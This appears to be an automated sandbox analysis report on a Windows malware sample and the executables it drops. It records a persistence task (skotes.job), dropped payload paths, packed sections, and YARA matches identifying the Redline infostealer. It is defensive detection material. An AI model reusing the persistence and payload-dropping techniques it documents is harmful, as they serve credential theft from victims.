                    Source: fb584dabd7.exe, 00000020.00000000.2839375451.0000000001002000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_1d830436-8
                    PE file contains section with special chars
                    Source: cMTqzvmx9u.exeStatic PE information: section name:
                    Source: cMTqzvmx9u.exeStatic PE information: section name: .idata
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name: .idata
                    Source: 7620ab885d.exe.5.drStatic PE information: section name:
                    Source: 7620ab885d.exe.5.drStatic PE information: section name: .rsrc
                    Source: 7620ab885d.exe.5.drStatic PE information: section name: .idata
                    Source: random[3].exe.5.drStatic PE information: section name:
                    Source: random[3].exe.5.drStatic PE information: section name: .idata
                    Source: random[3].exe.5.drStatic PE information: section name:
                    Source: random[1].exe.5.drStatic PE information: section name:
                    Source: random[1].exe.5.drStatic PE information: section name: .idata
                    Source: random[1].exe.5.drStatic PE information: section name:
                    Source: 8469cb4d4d.exe.5.drStatic PE information: section name:
                    Source: 8469cb4d4d.exe.5.drStatic PE information: section name: .idata
                    Source: 8469cb4d4d.exe.5.drStatic PE information: section name:
                    Source: random[1].exe0.5.drStatic PE information: section name:
                    Source: random[1].exe0.5.drStatic PE information: section name:
                    Source: random[1].exe0.5.drStatic PE information: section name:
                    Source: random[1].exe0.5.drStatic PE information: section name:
                    Source: random[1].exe0.5.drStatic PE information: section name:
                    Source: random[1].exe0.5.drStatic PE information: section name:
                    Source: random[1].exe0.5.drStatic PE information: section name:
                    Source: random[1].exe0.5.drStatic PE information: section name:
                    Source: 0a7e8af92e.exe.5.drStatic PE information: section name:
                    Source: 0a7e8af92e.exe.5.drStatic PE information: section name:
                    Source: 0a7e8af92e.exe.5.drStatic PE information: section name:
                    Source: 0a7e8af92e.exe.5.drStatic PE information: section name:
                    Source: 0a7e8af92e.exe.5.drStatic PE information: section name:
                    Source: 0a7e8af92e.exe.5.drStatic PE information: section name:
                    Source: 0a7e8af92e.exe.5.drStatic PE information: section name:
                    Source: 0a7e8af92e.exe.5.drStatic PE information: section name:
                    Source: random[1].exe1.5.drStatic PE information: section name:
                    Source: random[1].exe1.5.drStatic PE information: section name: .rsrc
                    Source: random[1].exe1.5.drStatic PE information: section name: .idata
                    Source: random[1].exe2.5.drStatic PE information: section name:
                    Source: random[1].exe2.5.drStatic PE information: section name: .idata
                    Source: random[1].exe2.5.drStatic PE information: section name:
                    Source: b285303eae.exe.5.drStatic PE information: section name:
                    Source: b285303eae.exe.5.drStatic PE information: section name: .idata
                    Source: b285303eae.exe.5.drStatic PE information: section name:
                    Source: random[3].exe0.5.drStatic PE information: section name:
                    Source: random[3].exe0.5.drStatic PE information: section name: .idata
                    Source: random[3].exe0.5.drStatic PE information: section name:
                    Source: b9ba85c997.exe.5.drStatic PE information: section name:
                    Source: b9ba85c997.exe.5.drStatic PE information: section name: .idata
                    Source: b9ba85c997.exe.5.drStatic PE information: section name:
                    Source: random[2].exe2.5.drStatic PE information: section name:
                    Source: random[2].exe2.5.drStatic PE information: section name: .idata
                    Source: e6e4c20fad.exe.5.drStatic PE information: section name:
                    Source: e6e4c20fad.exe.5.drStatic PE information: section name: .idata
                    Source: f53b3c5fe2.exe.5.drStatic PE information: section name:
                    Source: f53b3c5fe2.exe.5.drStatic PE information: section name: .idata
                    Source: f53b3c5fe2.exe.5.drStatic PE information: section name:
                    Source: random[3].exe2.5.drStatic PE information: section name:
                    Source: random[3].exe2.5.drStatic PE information: section name: .idata
                    Source: 96e283ac77.exe.5.drStatic PE information: section name:
                    Source: 96e283ac77.exe.5.drStatic PE information: section name: .idata
                    Source: 6b06c8a266.exe.5.drStatic PE information: section name:
                    Source: 6b06c8a266.exe.5.drStatic PE information: section name: .idata
                    Source: 6b06c8a266.exe.5.drStatic PE information: section name:
                    Source: random[4].exe0.5.drStatic PE information: section name:
                    Source: random[4].exe0.5.drStatic PE information: section name: .idata
                    Source: random[4].exe0.5.drStatic PE information: section name:
                    Source: 24da220eed.exe.5.drStatic PE information: section name:
                    Source: 24da220eed.exe.5.drStatic PE information: section name: .idata
                    Source: 24da220eed.exe.5.drStatic PE information: section name:
                    Source: MZHUJDVAZFQBUC9CQYK.exe.29.drStatic PE information: section name:
                    Source: MZHUJDVAZFQBUC9CQYK.exe.29.drStatic PE information: section name: .idata
                    Source: E8X4KAZW48ZU3YY0Y4JPME949S3Q.exe.29.drStatic PE information: section name:
                    Source: E8X4KAZW48ZU3YY0Y4JPME949S3Q.exe.29.drStatic PE information: section name: .idata
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeFile deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeCode function: 0_2_00B478BB0_2_00B478BB
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeCode function: 0_2_00B488600_2_00B48860
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeCode function: 0_2_00B470490_2_00B47049
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeCode function: 0_2_00B431A80_2_00B431A8
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeCode function: 0_2_00B04B300_2_00B04B30
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeCode function: 0_2_00B04DE00_2_00B04DE0
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeCode function: 0_2_00B42D100_2_00B42D10
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeCode function: 0_2_00B4779B0_2_00B4779B
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeCode function: 0_2_00B37F360_2_00B37F36
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C178BB2_2_00C178BB
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C170492_2_00C17049
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C188602_2_00C18860
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C131A82_2_00C131A8
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BD4B302_2_00BD4B30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BD4DE02_2_00BD4DE0
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C12D102_2_00C12D10
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C1779B2_2_00C1779B
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C07F362_2_00C07F36
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00C178BB3_2_00C178BB
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00C170493_2_00C17049
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00C188603_2_00C18860
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00C131A83_2_00C131A8
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00BD4B303_2_00BD4B30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00BD4DE03_2_00BD4DE0
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00C12D103_2_00C12D10
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00C1779B3_2_00C1779B
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00C07F363_2_00C07F36
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FE58D59_2_00FE58D5
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FDB1009_2_00FDB100
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_010092809_2_01009280
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF3B509_2_00FF3B50
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FFD34A9_2_00FFD34A
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_01010D209_2_01010D20
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_0100C5A09_2_0100C5A0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF74409_2_00FF7440
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_010104609_2_01010460
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF1D009_2_00FF1D00
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FDE6879_2_00FDE687
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF2E6D9_2_00FF2E6D
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FDCE459_2_00FDCE45
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FD86009_2_00FD8600
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_01008EA09_2_01008EA0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FE27509_2_00FE2750
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FEB8F69_2_00FEB8F6
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FE60E99_2_00FE60E9
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FFC0E69_2_00FFC0E6
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FFA0CA9_2_00FFA0CA
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FEC8A09_2_00FEC8A0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FFC09E9_2_00FFC09E
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_0100F18B9_2_0100F18B
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FDC8409_2_00FDC840
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FDD83C9_2_00FDD83C
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_011869CC9_2_011869CC
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FDD0219_2_00FDD021
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_010109E09_2_010109E0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FED0039_2_00FED003
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FFC9EB9_2_00FFC9EB
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF81CC9_2_00FF81CC
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF39B99_2_00FF39B9
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF91AE9_2_00FF91AE
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FFE1809_2_00FFE180
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FD397B9_2_00FD397B
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FE81699_2_00FE8169
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FD61609_2_00FD6160
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FEE9609_2_00FEE960
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FFC09E9_2_00FFC09E
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_010088B09_2_010088B0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_010038D09_2_010038D0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF69109_2_00FF6910
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FD59019_2_00FD5901
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FE9AD09_2_00FE9AD0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF42D09_2_00FF42D0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF8ABC9_2_00FF8ABC
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FD42709_2_00FD4270
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FEE2209_2_00FEE220
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF83D89_2_00FF83D8
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FD73D09_2_00FD73D0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FDF3C09_2_00FDF3C0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_0100CA409_2_0100CA40
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_0100DA4D9_2_0100DA4D
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_01005A4F9_2_01005A4F
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FEEB809_2_00FEEB80
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_01009A809_2_01009A80
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FFF3779_2_00FFF377
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FDAB409_2_00FDAB40
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF13409_2_00FF1340
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FE8B1B9_2_00FE8B1B
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FD93109_2_00FD9310
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FDD4F39_2_00FDD4F3
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF24E09_2_00FF24E0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_01009D309_2_01009D30
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF04C69_2_00FF04C6
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FE4CA09_2_00FE4CA0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_0100FD709_2_0100FD70
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FE747D9_2_00FE747D
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_01007DA99_2_01007DA9
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_0100A5D49_2_0100A5D4
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_0100CDF09_2_0100CDF0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_01003C109_2_01003C10
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FD5DC09_2_00FD5DC0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_0100A4409_2_0100A440
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF45609_2_00FF4560
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FFCD5E9_2_00FFCD5E
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FFCD4C9_2_00FFCD4C
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FFC53C9_2_00FFC53C
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF6D2E9_2_00FF6D2E
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FE1D2B9_2_00FE1D2B
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FE051B9_2_00FE051B
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_01001CF09_2_01001CF0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF46D09_2_00FF46D0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FEAEB09_2_00FEAEB0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FFFE749_2_00FFFE74
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF0E6C9_2_00FF0E6C
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FFEE639_2_00FFEE63
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FEE6309_2_00FEE630
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FE961B9_2_00FE961B
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FDF60D9_2_00FDF60D
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_0100FE009_2_0100FE00
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_010086509_2_01008650
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FD97809_2_00FD9780
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FE6F529_2_00FE6F52
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF77409_2_00FF7740
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF97399_2_00FF9739
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF5F1B9_2_00FF5F1B
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_010106F09_2_010106F0
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00BEDF80 appears 36 times
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00BE80C0 appears 260 times
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: String function: 00FD7F60 appears 40 times
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: String function: 00FE4C90 appears 77 times
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeCode function: String function: 00B180C0 appears 130 times
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 1980
                    Source: cMTqzvmx9u.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 11.2.0a7e8af92e.exe.1c1310fe590.3.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                    Source: 11.2.0a7e8af92e.exe.1c1310d6568.2.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                    Source: 11.2.0a7e8af92e.exe.1c1310fe590.3.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                    Source: 11.2.0a7e8af92e.exe.1c1310d6568.2.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                    Source: 11.2.0a7e8af92e.exe.1c13114e5a8.1.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                    Source: 11.2.0a7e8af92e.exe.1c13114e5a8.1.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                    Source: 16.0.DJj.exe.1b0000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                    Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
                    Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe, type: DROPPEDMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\output[1].png, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
                    Source: 7620ab885d.exe.5.drStatic PE information: Section: ZLIB complexity 0.9994702308006536
                    Source: random[3].exe.5.drStatic PE information: Section: xyfieepk ZLIB complexity 0.9940755390646877
                    Source: random[1].exe.5.drStatic PE information: Section: ZLIB complexity 0.9974582619863014
                    Source: random[1].exe.5.drStatic PE information: Section: wekcazbo ZLIB complexity 0.9943740803274977
                    Source: 8469cb4d4d.exe.5.drStatic PE information: Section: ZLIB complexity 0.9974582619863014
                    Source: 8469cb4d4d.exe.5.drStatic PE information: Section: wekcazbo ZLIB complexity 0.9943740803274977
                    Source: random[1].exe1.5.drStatic PE information: Section: ZLIB complexity 0.9994702308006536
                    Source: random[2].exe0.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003244500411184
                    Source: 7ddd2a748c.exe.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003244500411184
                    Source: random[1].exe2.5.drStatic PE information: Section: ZLIB complexity 0.997464950770548
                    Source: random[1].exe2.5.drStatic PE information: Section: aseoxclk ZLIB complexity 0.9949617656389967
                    Source: b285303eae.exe.5.drStatic PE information: Section: ZLIB complexity 0.997464950770548
                    Source: b285303eae.exe.5.drStatic PE information: Section: aseoxclk ZLIB complexity 0.9949617656389967
                    Source: random[3].exe0.5.drStatic PE information: Section: ZLIB complexity 0.9995212928921569
                    Source: random[3].exe0.5.drStatic PE information: Section: qppoenam ZLIB complexity 0.9949168669871795
                    Source: b9ba85c997.exe.5.drStatic PE information: Section: ZLIB complexity 0.9995212928921569
                    Source: b9ba85c997.exe.5.drStatic PE information: Section: qppoenam ZLIB complexity 0.9949168669871795
                    Source: f53b3c5fe2.exe.5.drStatic PE information: Section: ZLIB complexity 0.9974582619863014
                    Source: f53b3c5fe2.exe.5.drStatic PE information: Section: wekcazbo ZLIB complexity 0.9943740803274977
                    Source: 6b06c8a266.exe.5.drStatic PE information: Section: xyfieepk ZLIB complexity 0.9940755390646877
                    Source: random[4].exe0.5.drStatic PE information: Section: uiswpquv ZLIB complexity 0.9899963146425432
                    Source: 24da220eed.exe.5.drStatic PE information: Section: uiswpquv ZLIB complexity 0.9899963146425432
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@95/117@0/40
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_01002070 CoCreateInstance,9_2_01002070
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeFile created: C:\Program Files\Google\Chrome\Extensions
